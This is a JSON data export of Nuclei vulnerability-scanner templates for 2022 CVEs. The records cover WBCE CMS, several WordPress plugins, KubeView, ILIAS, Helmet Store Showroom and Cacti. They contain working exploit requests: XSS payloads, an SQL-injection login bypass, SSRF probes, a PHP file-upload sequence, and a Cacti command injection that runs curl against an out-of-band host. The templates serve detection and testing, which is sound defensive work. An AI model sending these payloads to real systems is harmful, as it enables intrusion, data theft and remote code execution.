1\n regex:\n - 'name=\"password_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: formtoken\n group: 1\n regex:\n - 'name=\"formtoken\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: username_fieldname_2\n group: 1\n regex:\n - 'name=\"username_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n# digest: 490a0046304402200bbd80622f1f04490521053deeca5606b0a210f7653053a685aaa4abce0fca8402204d4cd83e2003265d8894d8f57d458ccb79a94b581644b8968eb1b268fbb063b2:922c64590222798bb761d5b6d8e72950", "hash": "e291206e70c454a21d75492897677eb0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085cb" }, "name": "CVE-2022-45038.yaml", "content": "id: 
CVE-2022-45038\n\ninfo:\n name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)\n author: theamanrawat\n severity: medium\n description: |\n A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of WBCE CMS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/WBCE/WBCE_CMS\n - https://shimo.im/docs/Ee32MrJd80iEwyA2/read\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45038\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-45038\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 5\n vendor: wbce\n product: wbce_cms\n tags: cve2022,cve,xss,wbce,cms,authenticated\n\nhttp:\n - raw:\n - |\n GET /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n - |\n GET /admin/settings/ HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/settings/save.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
advanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n - |\n GET /search/index.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Results For\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username_fieldname\n group: 1\n regex:\n - 'name=\"username_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: password_fieldname\n group: 1\n regex:\n - 'name=\"password_fieldname\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: formtoken\n group: 1\n regex:\n - 'name=\"formtoken\" value=\"(.*)\"'\n internal: true\n part: body\n\n - type: regex\n name: app_name\n group: 1\n regex:\n - 'name=\"app_name\" value=\"(.*?)\"'\n internal: true\n part: body\n# digest: 490a004630440220236c2ea7a5a87ab71674dcbc6b934a4397029b3d326ba6f7e3a9a51beacb9a94022066f22477022e34bd8d4bd31f88af1c31eae3632e616489ed4c7763b4ea2aaa8d:922c64590222798bb761d5b6d8e72950", "hash": "e00a820379960480a32c82a56e1e2192", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085cc" }, "name": "CVE-2022-45354.yaml", "content": "id: CVE-2022-45354\n\ninfo:\n name: Download Monitor <= 4.7.60 - Sensitive Information Exposure\n author: DhiyaneshDK\n severity: high\n description: |\n The Download 
Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access.\n remediation: |\n Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability.\n reference:\n - https://github.com/RandomRobbieBF/CVE-2022-45354\n - https://wordpress.org/plugins/download-monitor/\n - https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-7-60-sensitive-data-exposure-vulnerability?_s_id=cve\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-45354\n epss-score: 0.00408\n epss-percentile: 0.73349\n cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpchill\n product: download_monitor\n framework: wordpress\n shodan-query: html:\"/wp-content/plugins/download-monitor/\"\n tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/download-monitor/v1/user_data\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"registered\":'\n - '\"display_name\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206621ba65377b37becb2284647d51d4fe5423206a1ad56f63d7415c1fc1df85b602205154d8ffe0a0ab0837dcfabe75991d8434b2c1787f71eedbb5faad326966cc53:922c64590222798bb761d5b6d8e72950", "hash": "ad64e217d6bb0d2103228927619a2d20", "level": 5, "time": 
"2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085cd" }, "name": "CVE-2022-45362.yaml", "content": "id: CVE-2022-45362\n\ninfo:\n name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery\n author: theamanrawat\n severity: medium\n description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n remediation: |\n Update to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch.\n reference:\n - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability\n - https://wordpress.org/plugins/paytm-payments/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45362\n - https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-45362\n cwe-id: CWE-918\n epss-score: 0.00177\n epss-percentile: 0.54919\n cpe: cpe:2.3:a:paytm:payment_gateway:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: paytm\n product: payment_gateway\n framework: wordpress\n tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm\n\nhttp:\n - raw:\n - |\n GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"paytm-payments.css\"\n\n - type: 
status\n status:\n - 200\n# digest: 4b0a00483046022100a606fdab9141a48eca5d7f8c40acd7f3ba3028d4d72dc00349a20faed5122a37022100b040277863f3df37d504e8dd431bd931484d0f7c9344cc658e8926bf3b62cb23:922c64590222798bb761d5b6d8e72950", "hash": "ca710ee8a7b1e7f84dd86c87a7c247fe", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ce" }, "name": "CVE-2022-45365.yaml", "content": "id: CVE-2022-45365\n\ninfo:\n name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting\n author: theamanrawat\n severity: medium\n description: |\n The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n remediation: Fixed in version 3.23.3\n reference:\n - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3232-reflected-cross-site-scripting-in-ajax-stockticker-symbol-search-test\n - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability\n - https://wordpress.org/plugins/stock-ticker/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45365\n - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-45365\n cwe-id: CWE-79\n epss-score: 0.00064\n epss-percentile: 0.26193\n cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: urosevic\n product: stock_ticker\n framework: wordpress\n 
publicwww-query: \"/wp-content/plugins/stock-ticker/\"\n tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Stock Ticker Fatal\"\n - \"=6'\n - 'status_code_2 == 200'\n - 'contains(body_2, \"toplevel_page_paytm\")'\n condition: and\n# digest: 4a0a00473045022100fe699581fce1607f8724c7eac0c383fe061097ffc20bc0354bc2e269838e870102203fccdf0ab3f4266ac65a87df7587b0382e83527c032d713c3504102914c28652:922c64590222798bb761d5b6d8e72950", "hash": "93b72cd0600fb1d6623e99a253838817", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d0" }, "name": "CVE-2022-45835.yaml", "content": "id: CVE-2022-45835\n\ninfo:\n name: WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: |\n WordPress PhonePe Payment Solutions plugin through 1.0.15 is susceptible to server-side request forgery. 
An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can exploit this vulnerability to send arbitrary HTTP requests from the server, potentially leading to unauthorized access to internal resources or performing actions on behalf of the server.\n remediation: Fixed in version 2.0.0.\n reference:\n - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf\n - https://wordpress.org/plugins/phonepe-payment-solutions/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45835\n - https://patchstack.com/database/vulnerability/phonepe-payment-solutions/wordpress-phonepe-payment-solutions-plugin-1-0-15-server-side-request-forgery-ssrf?_s_id=cve\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-45835\n cwe-id: CWE-918\n epss-score: 0.00359\n epss-percentile: 0.71627\n cpe: cpe:2.3:a:phonepe:phonepe:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phonepe\n product: phonepe\n framework: wordpress\n tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,phonepe-payment-solutions,unauth,oast,phonepe\n\nhttp:\n - raw:\n - |\n GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"cURL Test for PhonePe\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220647e8f5f43a41c1a5aa3e3e63c2cfc8fe1a095dec58d83435c28fa7bd8670a06022005456b8e4eaa85755e6312e7fb4b336d568fd2f5df3868e19a0bff431f1b0174:922c64590222798bb761d5b6d8e72950", "hash": "8a02b932c8824882c0998bc7b04fb25d", "level": 5, "time": 
"2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d1" }, "name": "CVE-2022-45917.yaml", "content": "id: CVE-2022-45917\n\ninfo:\n name: ILIAS eLearning <7.16 - Open Redirect\n author: arafatansari\n severity: medium\n description: |\n ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade to ILIAS eLearning version 7.16 or later to fix the open redirect vulnerability.\n reference:\n - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html\n - https://seclists.org/fulldisclosure/2022/Dec/7\n - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/\n - https://github.com/advisories/GHSA-hf6q-rx44-fh6j\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45917\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-45917\n cwe-id: CWE-601\n epss-score: 0.00221\n epss-percentile: 0.60222\n cpe: cpe:2.3:a:ilias:ilias:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ilias\n product: ilias\n shodan-query: http.html:\"ILIAS\"\n tags: cve,cve2022,redirect,packetstorm,seclists,ilias,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me\"\n - \"{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me\"\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$'\n# digest: 
4a0a00473045022074c907eb4d6662a485c5cf6a20275f49eb358e805470537fa2dbc2bce50294bf022100ba0bf38c3ae8f7f5c83e2be6e7139d53450397f272542f5ab8fb570c876547cc:922c64590222798bb761d5b6d8e72950", "hash": "bb80923e736156c9192cf97f17843957", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d2" }, "name": "CVE-2022-45933.yaml", "content": "id: CVE-2022-45933\n\ninfo:\n name: KubeView <=0.1.31 - Information Disclosure\n author: For3stCo1d\n severity: critical\n description: |\n KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933).\n reference:\n - https://github.com/benc-uk/kubeview/issues/95\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933\n - https://nvd.nist.gov/vuln/detail/CVE-2022-45933\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-45933\n cwe-id: CWE-306\n epss-score: 0.00908\n epss-percentile: 0.82406\n cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: kubeview_project\n product: kubeview\n shodan-query: http.title:\"KubeView\"\n tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/scrape/kube-system\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'BEGIN CERTIFICATE'\n - 'END CERTIFICATE'\n - 'kubernetes.io'\n condition: and\n\n - type: 
status\n status:\n - 200\n# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950", "hash": "68ed4de78be2a95c48031644b82bac9e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d3" }, "name": "CVE-2022-46020.yaml", "content": "id: CVE-2022-46020\n\ninfo:\n name: WBCE CMS v1.5.4 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WBCE CMS v1.5.4 allows an authenticated attacker to achieve remote code execution (getshell) by modifying the permitted upload file types.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.\n reference:\n - https://github.com/WBCE/WBCE_CMS\n - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46020\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-46020\n cwe-id: CWE-434\n epss-score: 0.02743\n epss-percentile: 0.90317\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 6\n vendor: wbce\n product: wbce_cms\n tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive\n\nhttp:\n - raw:\n - |\n GET /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n - |\n GET /admin/settings/index.php?advanced=yes HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/settings/save.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true§ion_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n - |\n POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"reqid\"\n\n test\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"cmd\"\n\n upload\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"target\"\n\n l1_Lw\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-php\n\n \n\n -----------------------------213974337328367932543216511988\n Content-Disposition: form-data; name=\"mtime[]\"\n\n test\n -----------------------------213974337328367932543216511988--\n - |\n GET /media/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_6\n words:\n - 751a8ba516522786d551075a092a7a84\n\n - type: word\n part: 
header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: username_fieldname\n group: 1\n regex:\n - name=\"username_fieldname\" value=\"(.*)\"\n internal: true\n part: body\n\n - type: regex\n name: password_fieldname\n group: 1\n regex:\n - name=\"password_fieldname\" value=\"(.*)\"\n internal: true\n part: body\n\n - type: regex\n name: formtoken\n group: 1\n regex:\n - name=\"formtoken\" value=\"(.*)\"\n internal: true\n part: body\n\n - type: regex\n name: app_name\n group: 1\n regex:\n - name=\"app_name\" value=\"(.*)\"\n internal: true\n part: body\n# digest: 4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950", "hash": "e44ff6e8bb6caea177e1a6f1cae1fc1c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d4" }, "name": "CVE-2022-46071.yaml", "content": "id: CVE-2022-46071\n\ninfo:\n name: Helmet Store Showroom v1.0 - SQL Injection\n author: Harsh\n severity: critical\n description: |\n There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. 
This vulnerability can be exploited to bypass admin access.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://yuyudhn.github.io/CVE-2022-46071/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46071\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-46071\n cwe-id: CWE-89\n epss-score: 0.01454\n epss-percentile: 0.86393\n cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: helmet_store_showroom_site_project\n product: helmet_store_showroom_site\n tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project\n\nhttp:\n - raw:\n - |\n POST /classes/Login.php?f=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username='+OR+1%3D1+--+-&password=1234\n - |\n GET /admin/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")'\n condition: and\n# digest: 4b0a004830460221008a28b99414d2dfa37f05b900afd1ede85d6928122a9802832f8cdf91a3f64cb90221008f371160f0cb6a42a2d306a44bbfc66fe9117fac833e12ef28a93ab878e58bbf:922c64590222798bb761d5b6d8e72950", "hash": "5c30cc521912db905603dba21851ba4f", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d5" }, "name": "CVE-2022-46073.yaml", "content": "id: CVE-2022-46073\n\ninfo:\n name: Helmet Store Showroom - Cross Site Scripting\n author: Harsh\n severity: medium\n description: |\n Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web 
pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://yuyudhn.github.io/CVE-2022-46073/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46073\n - https://www.youtube.com/watch?v=jT09Uiwl0Jo\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-46073\n cwe-id: CWE-79\n epss-score: 0.00094\n epss-percentile: 0.38558\n cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: helmet_store_showroom_project\n product: helmet_store_showroom\n tags: cve2022,cve,xss,helmet-store-showroom,helmet_store_showroom_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"Helmet Store Showroom\")'\n - 'contains(body, \">\")'\n condition: and\n# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950", "hash": "337e51ac3cebd3939c431f41aaa04d4a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d6" }, "name": "CVE-2022-46169.yaml", "content": "id: CVE-2022-46169\n\ninfo:\n name: Cacti <=1.2.22 - Remote Command Injection\n author: Hardik-Solanki,j4vaovo\n severity: critical\n description: |\n Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. 
An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability.\n reference:\n - https://security-tracker.debian.org/tracker/CVE-2022-46169\n - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf\n - https://www.cybersecurity-help.cz/vdb/SB2022121926\n - https://nvd.nist.gov/vuln/detail/CVE-2022-46169\n - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-46169\n cwe-id: CWE-78,CWE-74\n epss-score: 0.96526\n epss-percentile: 0.9958\n cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: cacti\n product: cacti\n shodan-query: title:\"Login to Cacti\"\n tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\n Host: {{Hostname}}\n X-Forwarded-For: 127.0.0.1\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"value\":'\n - '\"local_data_id\":'\n condition: and\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950", "hash": "16b6533cf65debb15e659f956b861bc2", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085d7" }, "name": "CVE-2022-46381.yaml", "content": "id: CVE-2022-46381\n\ninfo:\n name: Linear eMerge E3-Series - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or update provided by the 